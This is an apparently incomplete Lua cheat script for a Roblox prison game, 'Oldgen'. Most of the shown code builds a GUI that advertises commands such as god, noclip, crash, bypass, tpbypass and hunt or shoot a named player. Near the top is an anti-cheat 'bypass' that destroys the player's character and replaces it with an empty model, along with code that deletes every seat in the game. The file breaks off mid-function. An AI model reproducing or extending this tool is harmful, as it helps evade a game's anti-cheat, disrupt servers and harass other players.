
--  ▒█████   ██▓    ▓█████▄   ▄████ ▓█████  ███▄    █ 
--  ▒██▒  ██▒▓██▒    ▒██▀ ██▌ ██▒ ▀█▒▓█   ▀  ██ ▀█   █ 
--  ▒██░  ██▒▒██░    ░██   █▌▒██░▄▄▄░▒███   ▓██  ▀█ ██▒
--  ▒██   ██░▒██░    ░▓█▄   ▌░▓█  ██▓▒▓█  ▄ ▓██▒  ▐▌██▒
--  ░ ████▓▒░░██████▒░▒████▓ ░▒▓███▀▒░▒████▒▒██░   ▓██░
--  ░ ▒░▒░▒░ ░ ▒░▓  ░ ▒▒▓  ▒  ░▒   ▒ ░░ ▒░ ░░ ▒░   ▒ ▒ 
--  ░ ▒ ▒░ ░ ░ ▒  ░ ░ ▒  ▒   ░   ░  ░ ░  ░░ ░░   ░ ▒░
--  ░ ░ ░ ▒    ░ ░    ░ ░  ░ ░ ░   ░    ░      ░   ░ ░ 
--  ░ ░      ░  ░   ░          ░    ░  ░         ░ 
--  ░                                


-- a garbage script made by Scartesu/RoyaIScar

-- updated at 13/11/21 --

-- still being updated

-- hmu on discord if theres any errors i missed (Scar ye v2#7410)


local prefix = "'"
local god = false
local noclip = false
local tpbypass = false
local hunt = false
local invis = false
local sprint = true
local sprintspeed = 300
local shoottoggle = false
local spinning = false
local antigh = false
camsettings = {
	locking = false,
	locktarget = nil,

}

local oldgenui = Instance.new("ScreenGui")
local oldgen = Instance.new("ScreenGui")
local introframe = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
local tag = Instance.new("ScreenGui")
local m = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")

local Credits = Instance.new("Frame")
local TextLabela = Instance.new("TextLabel")
local TextLabelb = Instance.new("TextLabel")
local close = Instance.new("TextButton")
local ImageLabel = Instance.new("ImageLabel")
local TextLabel_key = Instance.new("TextLabel")
--Properties:

oldgen.Name = "oldgen"
oldgen.Parent = game.CoreGui
oldgenui.Parent = game.CoreGui

introframe.Name = "introframe"
introframe.Parent = oldgen
introframe.BackgroundColor3 = Color3.fromRGB(56, 56, 56)
introframe.BorderSizePixel = 0
introframe.Position = UDim2.new(0.339393944, 0, 0.169533163, 0)
introframe.Size = UDim2.new(0, 7, 0, 8)

TextLabel.Parent = introframe
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 5.000
TextLabel.Position = UDim2.new(0.155131266, 0, 0, 0)
TextLabel.Size = UDim2.new(0, 200, 0, 50)
TextLabel.Font = Enum.Font.GothamSemibold
TextLabel.Text = "Old"
TextLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
TextLabel.TextSize = 50.000

TextLabel_2.Parent = introframe
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 5.000
TextLabel_2.Position = UDim2.new(0.350835323, 0, 0.00432900432, 0)
TextLabel_2.Size = UDim2.new(0, 200, 0, 50)
TextLabel_2.Font = Enum.Font.GothamSemibold
TextLabel_2.Text = "Gen"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 40.000

TextLabel_3.Parent = introframe
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 5.000
TextLabel_3.Position = UDim2.new(0.260143191, 0, 0.190476194, 0)
TextLabel_3.Size = UDim2.new(0.479713589, 0, 0.125541121, 0)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "Prison Script"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 50.000

-- Scripts:

local function SCMJRG_fake_script() -- introframe.LocalScript 
	local script = Instance.new('LocalScript', introframe)


	wait(0.3)
	script.Parent:TweenSize(UDim2.new(0, 419,0, 231),"In")
	wait(5)
	script.Parent:TweenSize(UDim2.new(0, 7,0, 8),"In")
	wait(1.2)
	introframe.Visible = false



end
coroutine.wrap(SCMJRG_fake_script)()

wait(5.6)

game:GetService("StarterGui"):SetCore("SendNotification", {
	Title = "Oldgen";
	Text = "Welcome To Oldgen, The Worlds Worst And Actual Unskidded Script (Apart From Tops :c)";
})

for _,v in pairs(game.Workspace:GetDescendants()) do
	if v.Name == "Seat" then
		v:Destroy()
	end
end

-- added an actual bypass i made cus why not
local me = game.Players.LocalPlayer
local mename = game.Players.LocalPlayer.Name

local Humanoid = Instance.new("Model" ,game.Workspace)
Humanoid.Name = ""..mename..""
me.Character:Destroy()

-- cant find me :)
local nono = {"7w4c"}

if table.find(nono,game.Players.LocalPlayer.Name) then
	game.Players.LocalPlayer:Kick("Blacklisted")
else
	print("not blacklisted")
end

wait(1.5)

me.Character = Humanoid
-- end bypass --

wait(5)

game:GetService("StarterGui"):SetCore("SendNotification", {
	Title = "Oldgen";
	Text = "say \'cmds\ for help or ; to use cmd bar";
})
wait(0.5)
game:GetService("StarterGui"):SetCore("SendNotification", {
	Title = "Oldgen";
	Text = "fix update: removed several errors and increased performance";
})

tag.Name = "tag"
tag.Parent = game.CoreGui

m.Name = "m"
m.Parent = tag
m.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
m.BackgroundTransparency = 1.000
m.BorderSizePixel = 0
m.Position = UDim2.new(0.943636358, 0, 0.87714988, 0)
m.Size = UDim2.new(0, 100, 0, 100)

TextLabel.Parent = m
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(-0.5, 0, 0.379999995, 0)
TextLabel.Size = UDim2.new(0, 135, 0, 50)
TextLabel.Font = Enum.Font.Cartoon
TextLabel.Text = "Oldgen"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 40.000


function showcmds()
	local cmds = Instance.new("Frame")
	local TextLabel_3 = Instance.new("TextLabel")
	local TextLabel_4 = Instance.new("TextLabel")
	local TextLabel_5 = Instance.new("TextLabel")
	local TextLabel_6 = Instance.new("TextLabel")
	local TextLabel_7 = Instance.new("TextLabel")
	local TextLabel_8 = Instance.new("TextLabel")
	local TextLabel_9 = Instance.new("TextLabel")
	local TextLabel_10 = Instance.new("TextLabel")
	local TextLabel_11 = Instance.new("TextLabel")
	local X = Instance.new("TextButton")
	local TextLabel_12 = Instance.new("TextLabel")
	local TextLabel_nc = Instance.new("TextLabel")
	local TextLabel_rj = Instance.new("TextLabel")
	local TextLabel_c = Instance.new("TextLabel")
	local TextLabel_cr = Instance.new("TextLabel")
	local TextLabel_se = Instance.new("TextLabel")
	local TextLabel_by = Instance.new("TextLabel")
	local TextLabel_un = Instance.new("TextLabel")
	local TextLabel_tpb = Instance.new("TextLabel")
	local TextLabel_untpb = Instance.new("TextLabel")
	local TextLabel_hu = Instance.new("TextLabel")
	local TextLabel_unh = Instance.new("TextLabel")
	local TextLabel_vi = Instance.new("TextLabel")
	local TextLabel_unv = Instance.new("TextLabel")
	local TextLabel_fs = Instance.new("TextLabel")
	local TextLabel_go = Instance.new("TextLabel")
	local TextLabel_cam = Instance.new("TextLabel")
	local TextLabel_unc = Instance.new("TextLabel")
	local TextLabel_bs = Instance.new("TextLabel")
	local TextLabel_sto = Instance.new("TextLabel")
	local TextLabel_air = Instance.new("TextLabel")
	local TextLabel_spi = Instance.new("TextLabel")
	local TextLabel_gh = Instance.new("TextLabel")

	cmds.Name = "cmds"
	cmds.Parent = oldgenui
	cmds.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
	cmds.BorderSizePixel = 0
	cmds.Position = UDim2.new(0.356969684, 0, 0.267813265, 0)
	cmds.Size = UDim2.new(0, 556, 0, 330)
	cmds.Visible = true
	cmds.Draggable = true

	TextLabel_3.Parent = cmds
	TextLabel_3.BackgroundColor3 = Color3.fromRGB(91, 91, 91)
	TextLabel_3.Position = UDim2.new(0, 0, 0.103030302, 0)
	TextLabel_3.Size = UDim2.new(0, 556, 0, 8)
	TextLabel_3.Font = Enum.Font.SourceSans
	TextLabel_3.Text = ""
	TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel_3.TextSize = 14.000
	TextLabel_3.BorderSizePixel = 0

	TextLabel_4.Parent = cmds
	TextLabel_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_4.BackgroundTransparency = 1.000
	TextLabel_4.Position = UDim2.new(-0.00539568346, 0, -0.00303030293, 0)
	TextLabel_4.Size = UDim2.new(0, 558, 0, 36)
	TextLabel_4.Font = Enum.Font.Ubuntu
	TextLabel_4.Text = "OldGen v6 Commands"
	TextLabel_4.TextColor3 = Color3.fromRGB(124, 124, 124)
	TextLabel_4.TextSize = 35.000
	TextLabel_4.Draggable = true

	TextLabel_5.Parent = cmds
	TextLabel_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_5.BackgroundTransparency = 1.000
	TextLabel_5.BorderSizePixel = 0
	TextLabel_5.Position = UDim2.new(0.0323740989, 0, 0.130303025, 0)
	TextLabel_5.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_5.Font = Enum.Font.Ubuntu
	TextLabel_5.Text = "'walkspeed [Value]"
	TextLabel_5.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_5.TextSize = 17.000

	TextLabel_6.Parent = cmds
	TextLabel_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_6.BackgroundTransparency = 1.000
	TextLabel_6.BorderSizePixel = 0
	TextLabel_6.Position = UDim2.new(0.0359712243, 0, 0.221212119, 0)
	TextLabel_6.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_6.Font = Enum.Font.Ubuntu
	TextLabel_6.Text = "'jumppower [Value]"
	TextLabel_6.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_6.TextSize = 17.000

	TextLabel_7.Parent = cmds
	TextLabel_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_7.BackgroundTransparency = 1.000
	TextLabel_7.BorderSizePixel = 0
	TextLabel_7.Position = UDim2.new(0.0107913669, 0, 0.312121212, 0)
	TextLabel_7.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_7.Font = Enum.Font.Ubuntu
	TextLabel_7.Text = "'shoot [Player]"
	TextLabel_7.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_7.TextSize = 17.000

	TextLabel_8.Parent = cmds
	TextLabel_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_8.BackgroundTransparency = 1.000
	TextLabel_8.BorderSizePixel = 0
	TextLabel_8.Position = UDim2.new(-0.0485611521, 0, 0.406060606, 0)
	TextLabel_8.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_8.Font = Enum.Font.Ubuntu
	TextLabel_8.Text = "'invis"
	TextLabel_8.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_8.TextSize = 17.000

	TextLabel_9.Parent = cmds
	TextLabel_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_9.BackgroundTransparency = 1.000
	TextLabel_9.BorderSizePixel = 0
	TextLabel_9.Position = UDim2.new(-0.0485611521, 0, 0.4909091, 0)
	TextLabel_9.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_9.Font = Enum.Font.Ubuntu
	TextLabel_9.Text = "'god"
	TextLabel_9.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_9.TextSize = 17.000

	TextLabel_10.Parent = cmds
	TextLabel_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_10.BackgroundTransparency = 1.000
	TextLabel_10.BorderSizePixel = 0
	TextLabel_10.Position = UDim2.new(0.019784173, 0, 0.578787863, 0)
	TextLabel_10.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_10.Font = Enum.Font.Ubuntu
	TextLabel_10.Text = "'predict [Value]"
	TextLabel_10.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_10.TextSize = 17.000

	TextLabel_11.Parent = cmds
	TextLabel_11.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_11.BackgroundTransparency = 1.000
	TextLabel_11.BorderSizePixel = 0
	TextLabel_11.Position = UDim2.new(-0.00179856119, 0, 0.675757587, 0)
	TextLabel_11.Size = UDim2.new(0, 89, 0, 50)
	TextLabel_11.Font = Enum.Font.Ubuntu
	TextLabel_11.Text = "'gripgui"
	TextLabel_11.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_11.TextSize = 17.000

	X.Name = "X"
	X.Parent = cmds
	X.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	X.BackgroundTransparency = 1.000
	X.Position = UDim2.new(0.956834555, 0, 0, 0)
	X.Size = UDim2.new(0.0467625894, 0, 0.0606879964, 0)
	X.Font = Enum.Font.RobotoMono
	X.Text = "X"
	X.TextColor3 = Color3.fromRGB(0, 0, 0)
	X.TextSize = 30.000
	X.MouseButton1Click:connect(function()
		cmds.Visible = false
	end)
	TextLabel_12.Parent = cmds
	TextLabel_12.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_12.BackgroundTransparency = 1.000
	TextLabel_12.BorderSizePixel = 0
	TextLabel_12.Position = UDim2.new(-0.00179856119, 0, 0.772727251, 0)
	TextLabel_12.Size = UDim2.new(0, 89, 0, 50)
	TextLabel_12.Font = Enum.Font.Ubuntu
	TextLabel_12.Text = "'ungod"
	TextLabel_12.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_12.TextSize = 17.000

	TextLabel_nc.Parent = cmds
	TextLabel_nc.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_nc.BackgroundTransparency = 1.000
	TextLabel_nc.BorderSizePixel = 0
	TextLabel_nc.Position = UDim2.new(0.230215833, 0, 0.13636364, 0)
	TextLabel_nc.Size = UDim2.new(0, 89, 0, 50)
	TextLabel_nc.Font = Enum.Font.Ubuntu
	TextLabel_nc.Text = "'noclip"
	TextLabel_nc.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_nc.TextSize = 17.000

	TextLabel_rj.Parent = cmds
	TextLabel_rj.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_rj.BackgroundTransparency = 1.000
	TextLabel_rj.BorderSizePixel = 0
	TextLabel_rj.Position = UDim2.new(0.230215833, 0, 0.24545455, 0)
	TextLabel_rj.Size = UDim2.new(0, 89, 0, 50)
	TextLabel_rj.Font = Enum.Font.Ubuntu
	TextLabel_rj.Text = "'rejoin"
	TextLabel_rj.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_rj.TextSize = 17.000

	TextLabel_c.Parent = cmds
	TextLabel_c.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_c.BackgroundTransparency = 1.000
	TextLabel_c.BorderSizePixel = 0
	TextLabel_c.Position = UDim2.new(0.20503597, 0, 0.345454544, 0)
	TextLabel_c.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_c.Font = Enum.Font.Ubuntu
	TextLabel_c.Text = "'clip"
	TextLabel_c.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_c.TextSize = 17.000

	TextLabel_cr.Parent = cmds
	TextLabel_cr.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_cr.BackgroundTransparency = 1.000
	TextLabel_cr.BorderSizePixel = 0
	TextLabel_cr.Position = UDim2.new(0.21223022, 0, 0.430303037, 0)
	TextLabel_cr.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_cr.Font = Enum.Font.Ubuntu
	TextLabel_cr.Text = "'crash"
	TextLabel_cr.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_cr.TextSize = 17.000

	TextLabel_se.Parent = cmds
	TextLabel_se.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_se.BackgroundTransparency = 1.000
	TextLabel_se.BorderSizePixel = 0
	TextLabel_se.Position = UDim2.new(0.246402875, 0, 0.518181801, 0)
	TextLabel_se.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_se.Font = Enum.Font.Ubuntu
	TextLabel_se.Text = "'serverhop"
	TextLabel_se.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_se.TextSize = 17.000

	TextLabel_by.Parent = cmds
	TextLabel_by.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_by.BackgroundTransparency = 1.000
	TextLabel_by.BorderSizePixel = 0
	TextLabel_by.Position = UDim2.new(0.226618707, 0, 0.593939424, 0)
	TextLabel_by.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_by.Font = Enum.Font.Ubuntu
	TextLabel_by.Text = "'bypass"
	TextLabel_by.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_by.TextSize = 17.000

	TextLabel_un.Parent = cmds
	TextLabel_un.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_un.BackgroundTransparency = 1.000
	TextLabel_un.BorderSizePixel = 0
	TextLabel_un.Position = UDim2.new(0.242805749, 0, 0.669696987, 0)
	TextLabel_un.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_un.Font = Enum.Font.Ubuntu
	TextLabel_un.Text = "'unbypass"
	TextLabel_un.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_un.TextSize = 17.000

	TextLabel_tpb.Parent = cmds
	TextLabel_tpb.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_tpb.BackgroundTransparency = 1.000
	TextLabel_tpb.BorderSizePixel = 0
	TextLabel_tpb.Position = UDim2.new(0.237410069, 0, 0.74545455, 0)
	TextLabel_tpb.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_tpb.Font = Enum.Font.Ubuntu
	TextLabel_tpb.Text = "'tpbypass"
	TextLabel_tpb.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_tpb.TextSize = 17.000

	TextLabel_untpb.Parent = cmds
	TextLabel_untpb.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_untpb.BackgroundTransparency = 1.000
	TextLabel_untpb.BorderSizePixel = 0
	TextLabel_untpb.Position = UDim2.new(0.255395681, 0, 0.824242413, 0)
	TextLabel_untpb.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_untpb.Font = Enum.Font.Ubuntu
	TextLabel_untpb.Text = "'untpbypass"
	TextLabel_untpb.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_untpb.TextSize = 17.000

	TextLabel_hu.Parent = cmds
	TextLabel_hu.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_hu.BackgroundTransparency = 1.000
	TextLabel_hu.BorderSizePixel = 0
	TextLabel_hu.Position = UDim2.new(0.41726619, 0, 0.148484856, 0)
	TextLabel_hu.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_hu.Font = Enum.Font.Ubuntu
	TextLabel_hu.Text = "'hunt [Player]"
	TextLabel_hu.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_hu.TextSize = 17.000

	TextLabel_unh.Parent = cmds
	TextLabel_unh.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_unh.BackgroundTransparency = 1.000
	TextLabel_unh.BorderSizePixel = 0
	TextLabel_unh.Position = UDim2.new(0.386690646, 0, 0.236363634, 0)
	TextLabel_unh.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_unh.Font = Enum.Font.Ubuntu
	TextLabel_unh.Text = "'unhunt"
	TextLabel_unh.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_unh.TextSize = 17.000

	TextLabel_vi.Parent = cmds
	TextLabel_vi.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_vi.BackgroundTransparency = 1.000
	TextLabel_vi.BorderSizePixel = 0
	TextLabel_vi.Position = UDim2.new(0.41726619, 0, 0.321212113, 0)
	TextLabel_vi.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_vi.Font = Enum.Font.Ubuntu
	TextLabel_vi.Text = "'view [Player]"
	TextLabel_vi.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_vi.TextSize = 17.000

	TextLabel_unv.Parent = cmds
	TextLabel_unv.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_unv.BackgroundTransparency = 1.000
	TextLabel_unv.BorderSizePixel = 0
	TextLabel_unv.Position = UDim2.new(0.383093536, 0, 0.409090906, 0)
	TextLabel_unv.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_unv.Font = Enum.Font.Ubuntu
	TextLabel_unv.Text = "'unview"
	TextLabel_unv.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_unv.TextSize = 17.000

	TextLabel_fs.Parent = cmds
	TextLabel_fs.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_fs.BackgroundTransparency = 1.000
	TextLabel_fs.BorderSizePixel = 0
	TextLabel_fs.Position = UDim2.new(0.435251802, 0, 0.5, 0)
	TextLabel_fs.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_fs.Font = Enum.Font.Ubuntu
	TextLabel_fs.Text = "'flyspeed [Value]"
	TextLabel_fs.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_fs.TextSize = 17.000

	TextLabel_go.Parent = cmds
	TextLabel_go.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_go.BackgroundTransparency = 1.000
	TextLabel_go.BorderSizePixel = 0
	TextLabel_go.Position = UDim2.new(0.41726619, 0, 0.593939424, 0)
	TextLabel_go.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_go.Font = Enum.Font.Ubuntu
	TextLabel_go.Text = "'goto [Player]"
	TextLabel_go.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_go.TextSize = 17.000

	TextLabel_cam.Parent = cmds
	TextLabel_cam.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_cam.BackgroundTransparency = 1.000
	TextLabel_cam.BorderSizePixel = 0
	TextLabel_cam.Position = UDim2.new(0.437050372, 0, 0.703030288, 0)
	TextLabel_cam.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_cam.Font = Enum.Font.Ubuntu
	TextLabel_cam.Text = "'camlock [Player]"
	TextLabel_cam.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_cam.TextSize = 17.000

	TextLabel_unc.Parent = cmds
	TextLabel_unc.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_unc.BackgroundTransparency = 1.000
	TextLabel_unc.BorderSizePixel = 0
	TextLabel_unc.Position = UDim2.new(0.399280578, 0, 0.790909111, 0)
	TextLabel_unc.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_unc.Font = Enum.Font.Ubuntu
	TextLabel_unc.Text = "'uncamlock"
	TextLabel_unc.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_unc.TextSize = 17.000

	TextLabel_bs.Parent = cmds
	TextLabel_bs.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_bs.BackgroundTransparency = 1.000
	TextLabel_bs.BorderSizePixel = 0
	TextLabel_bs.Position = UDim2.new(0.631294966, 0, 0.154545456, 0)
	TextLabel_bs.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_bs.Font = Enum.Font.Ubuntu
	TextLabel_bs.Text = "'blinkspeed [Value]"
	TextLabel_bs.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_bs.TextSize = 17.000

	TextLabel_sto.Parent = cmds
	TextLabel_sto.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_sto.BackgroundTransparency = 1.000
	TextLabel_sto.BorderSizePixel = 0
	TextLabel_sto.Position = UDim2.new(0.593525171, 0, 0.25151515, 0)
	TextLabel_sto.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_sto.Font = Enum.Font.Ubuntu
	TextLabel_sto.Text = "'stopshoot"
	TextLabel_sto.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_sto.TextSize = 17.000
	
	TextLabel_air.Parent = cmds
	TextLabel_air.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_air.BackgroundTransparency = 1.000
	TextLabel_air.BorderSizePixel = 0
	TextLabel_air.Position = UDim2.new(0.638489187, 0, 0.363636374, 0)
	TextLabel_air.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_air.Font = Enum.Font.Ubuntu
	TextLabel_air.Text = "'airwalk [on/off]"
	TextLabel_air.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_air.TextSize = 17.000
	
	TextLabel_spi.Parent = cmds
	TextLabel_spi.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_spi.BackgroundTransparency = 1.000
	TextLabel_spi.BorderSizePixel = 0
	TextLabel_spi.Position = UDim2.new(0.634892106, 0, 0.457575768, 0)
	TextLabel_spi.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_spi.Font = Enum.Font.Ubuntu
	TextLabel_spi.Text = "'spin / 'unspin"
	TextLabel_spi.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_spi.TextSize = 17.000
	
	TextLabel_gh.Parent = cmds
	TextLabel_gh.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_gh.BackgroundTransparency = 1.000
	TextLabel_gh.BorderSizePixel = 0
	TextLabel_gh.Position = UDim2.new(0.660071969, 0, 0.551515162, 0)
	TextLabel_gh.Size = UDim2.new(0, 114, 0, 50)
	TextLabel_gh.Font = Enum.Font.Ubuntu
	TextLabel_gh.Text = "'antigh/ 'noantigh"
	TextLabel_gh.TextColor3 = Color3.fromRGB(191, 191, 191)
	TextLabel_gh.TextSize = 17.000
end

function gripgui()
	local gripgui = Instance.new("ScreenGui")
	local main = Instance.new("Frame")
	local TextLabel = Instance.new("TextLabel")
	local Close = Instance.new("TextButton")
	local TextLabel_2 = Instance.new("TextLabel")
	local TextLabel_3 = Instance.new("TextLabel")
	local karambit = Instance.new("TextButton")
	local machete = Instance.new("TextButton")
	local pipe = Instance.new("TextButton")
	local TextLabel_4 = Instance.new("TextLabel")
	local extend = Instance.new("TextButton")
	local keybinds = Instance.new("TextButton")
	local shottypp = Instance.new("TextButton")
	local openframe = Instance.new("Frame")
	local open = Instance.new("TextButton")

	game:GetService("StarterGui"):SetCore("SendNotification", {
		Title = "Oldgen";
		Text = "Welcome To Oldgen Grip GUI, Made By Scar ye v2#7410";
	})

	gripgui.Name = "gripgui"
	gripgui.Parent = game.CoreGui

	main.Name = "main"
	main.Parent = gripgui
	main.BackgroundColor3 = Color3.fromRGB(98, 98, 98)
	main.Position = UDim2.new(0.300947875, 0, 0.205457464, 0)
	main.Size = UDim2.new(0, 505, 0, 390)
	main.Visible = true
	main.Draggable = true

	TextLabel.Parent = main
	TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel.BackgroundTransparency = 1.000
	TextLabel.Size = UDim2.new(0, 505, 0, 50)
	TextLabel.Font = Enum.Font.Kalam
	TextLabel.Text = "Oldgen Grip GUI V1.0"
	TextLabel.TextColor3 = Color3.fromRGB(56, 0, 0)
	TextLabel.TextSize = 60.000

	Close.Name = "Close"
	Close.Parent = main
	Close.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	Close.BackgroundTransparency = 1.000
	Close.Position = UDim2.new(0.954455435, 0, -0.00256410264, 0)
	Close.Size = UDim2.new(0, 24, 0, 22)
	Close.Font = Enum.Font.SciFi
	Close.Text = "X"
	Close.TextColor3 = Color3.fromRGB(0, 0, 0)
	Close.TextSize = 30.000
	Close.MouseButton1Click:connect(function()
		main.Visible = false
		openframe.Visible = true
	end)

	TextLabel_2.Parent = main
	TextLabel_2.BackgroundColor3 = Color3.fromRGB(176, 176, 176)
	TextLabel_2.BorderSizePixel = 0
	TextLabel_2.Position = UDim2.new(0.00198019808, 0, 0.35128206, 0)
	TextLabel_2.Size = UDim2.new(0, 504, 0, 6)
	TextLabel_2.Font = Enum.Font.SourceSans
	TextLabel_2.Text = ""
	TextLabel_2.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel_2.TextSize = 14.000

	TextLabel_3.Parent = main
	TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
	TextLabel_3.BackgroundTransparency = 1.000
	TextLabel_3.Position = UDim2.new(0.00198019808, 0, 0.223076925, 0)
	TextLabel_3.Size = UDim2.new(0, 256, 0, 50)
	TextLabel_3.Font = Enum.Font.Kalam
	TextLabel_3.Text = "Weapon Anims"
	TextLabel_3.TextColor3 = Color3.fromRGB(0, 0, 0)
	TextLabel_3.TextSize = 35.000

	karambit.Name = "karambit"
	karambit.Parent = main
	karambit.BackgroundColor3 = Color3.fromRGB(190, 190, 190)
	karambit.BorderSizePixel = 0
	karambit.Position = UDim2.new(0.0633663386, 0, 0.402564108, 0)
	karambit.Size = UDim2.new(0, 200, 0, 50)
	karambit.Font = Enum.Font.Kalam
	karambit.Text = "Karambit"
	karambit.TextColor3 = Color3.fromRGB(0, 0, 0)
	karambit.TextSize = 50.000
	karambit.MouseButton1Click:connect(function()
		game:GetService("StarterGui"):SetCore("SendNotification", {
			Title = "Oldgen";
			Text = "Karambit Enabled! Equip Knife.";
		})
